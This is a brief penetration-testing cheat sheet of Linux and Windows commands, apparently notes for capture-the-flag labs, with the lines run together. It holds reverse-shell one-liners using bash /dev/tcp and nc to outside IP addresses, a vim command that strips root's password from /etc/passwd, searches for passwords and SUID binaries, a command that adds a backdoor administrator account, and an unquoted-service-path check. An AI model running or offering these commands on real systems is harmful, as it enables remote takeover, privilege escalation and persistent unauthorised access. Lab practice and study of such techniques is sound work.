Useful Commands
Linux
/bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1'bash -c 'bash -i >& /dev/tcp/10.10.16.78/4444 0>&1'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/fsudo find / -type f -readable -exec grep -Hro "password" {} \;echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwdfind / -perm -4000 2>/dev/nullWindows
net user user Pwn3d! /add;net localgroup administrators user /addwmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """Last updated